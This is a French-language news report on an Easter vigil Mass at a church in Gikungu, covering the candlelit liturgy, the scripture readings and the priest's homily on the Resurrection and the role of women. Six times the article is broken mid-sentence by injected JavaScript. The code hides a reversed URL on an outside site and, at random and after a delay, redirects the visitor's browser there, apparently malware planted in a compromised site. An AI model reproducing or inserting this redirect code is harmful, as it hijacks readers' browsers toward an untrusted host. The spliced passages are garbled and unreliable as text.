Tout était en blanc dans l’église de la Sainte Trinité de Mont Sion Gikungu : l’ornement du chœur de l’église, l’habit liturgique des prêtres, l’uniforme de la Chorale Saint Nicolas de Flüe et même la majorité de l’accoutrement des fidèles. En plus de cela, la spécialité de cette veillée est que toute personne avait une bougie qu’elle devait allumer à partir de la lumière du cierge pascal allumé au début de la célébration de cette veillée. La procession du début de la Messe était silencieuse et moins perceptible sous la pénombre d’avant la tombée de la nuit comme il était déjà quelques temps après 18 heures.  Toutes les lampes de l’église et de ses alentours étaient éteintes selon ce que prévoit la liturgie de la veillée, mais la lumière provenait des bougies des fidèles allumées à partir du cierge pascal, ce qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnait une vue incroyablement belle dans cette église en forme de cuve selon son l’architecture. Les places de l’église et les gradins étaient occupés par les fidèles contents de la fête, seulement, comme la pluie avait voulu se joindre aux gens en fête quelques temps après le début de la Messe, le service du protocole a dû réaménager la disposition initiale des lieux.  

Le Père Herménégilde COYITUNGIYE était le célébrant principal et neuf autres prêtres étaient à ses côtés. Des neuf lectures proposées pour la veillée pascale, sept ont été lues, il s’agit de cinq lectures de l’Ancien Testament et deux du Nouveau Testament. Les cinq premières lectures ont été lues avant que le prêtre célébrant ne chante ‘Alléluia’ permettant à la chorale d’entonner ‘Gloria’ accompagné de tous les instruments de musique et même les cloches de l’église qui n’avaient pas sonné depuis le Jeudi Saint ont cette fois-ci retenties. Il s’agit du Livre de la Genèse (1,-2,2), Genèse (22, 1-2. 9. 10-13.15-18), Exode 14,15-15, 1a), Isaïe (55, 1-11) et Ezéchiel (36, 16-17a. 18-28). Les lectures du Nouveau Testament étaient l’épitre de saint Paul Apôtre aux Romains (6, 3-11) et l’Evangile selon saint Marc (16, 1-8).

Après la lecture de l’Évangile, le Père COYITUNGIYE a prêché l’homélie au début de laquelle il a dit : ‘C’est vrai, Jésus est ressuscité, Satan est couvert de honte’. Selon lui, chaque Pâques amène du nouveau, et celle-ci n’y a pas manqué. Nous devons le dire à haute voix, et le mauvais toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit l’entendre et le sentir. Par ces mots, il a entonné un chant de Pâques avant de souhaiter joyeuse fête à tous les fidèles qui étaient très nombreux en cette soirée. Se servant des mots du Pape François lors de la Pâque de l’an 2021, le Père COYITUNGIYE a dit que le Seigneur est avec chacun de nous, même dans les rêves. Que nous n’ayons pas la foi des souvenirs, mais plutôt du présent car, quand nous avons allumé le cierge pascal, nous avons dit que Jésus reste le même hier comme aujourd’hui et pour toujours. Nous nous souvenons également de la question posée aux femmes : Pourquoi cherchez-vous le vivant parmi les morts ?

Avec la Pâques, nous regartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons de près le rôle des hommes et celui des femmes. Les hommes ont été bien actifs et engagés dans ces circonstances. On citerait Juda qui avait vendu et livré Jésus aux mains de chefs politiques et religieux, les apôtres qui l’ont déserté dès son arrestation, Pilate qui l’a condamné sans qu’il ait un motif valable, le grand prêtre Anna qui a conseillé aux autres de laisser un seul homme mourir au lieu de laisser toute une nation périr et le soldat qui a transpercé Jésus d’une lance dans son côté droit. Mais quand même il y a eu Joseph d’Arimathée qui a pris le soin de demander le cadavre de Jésus et le mettre au tombeau. Les femmes, quant à elles, ont accompagné Jésus au Calvaire en pleurant, Véronique a essuyé la face de Jésus sur son chemin de croix, Marie, sa Mère s’est même tenue au pied de la croix pour être sûre de ne pas quitter son Fils et celles qui se sont rendues au tombeau le matin suivant le sabbat et qui ont été les premières à annoncer sa résurrection. Leurs dires n’ont pas été accueillis par les disciples de Jésus qui ne les ont pas crues. Le Père a pris cette belle occasion de demander à toutes les femmes d’aller annoncer la résurrection de Jésus à leurs maris et frères parce qu’il y en a qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doutent encore ou ne croient pas du tout.

Jésus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont nous célébrons la résurrection ne veut que nous retournions avec notre tombe en nous, mais plutôt que nous soyons dans la joie avec lui et tous nos prochains. La Pâques vient nous élever de cette tombe, et l’ange de Dieu est à nos côtés pour rouler la pierre qui est sur nous. Ainsi nous verrons la lumière du Soleil qui est le Christ ressuscité. Soyons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc tranquilles et vivons la vie nouvelle tel que saint Paul le dit : Comme vous êtes ressuscités avec le Christ, recherchons les biens du ciel.

Signalons enfin que la Messe de la veillée pascale a commencé à 18 heures pour se terminer à quelques minutes de 22 heures. Bien les heures furent avancées, les fidèles ont pris leur temps de prendre avec eux l’eau bénite en cette cérémonie.

Nyandwi M.